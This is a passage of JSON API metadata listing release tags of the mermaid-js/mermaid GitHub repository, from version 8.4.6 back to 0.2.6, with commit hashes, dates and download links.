hub/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6"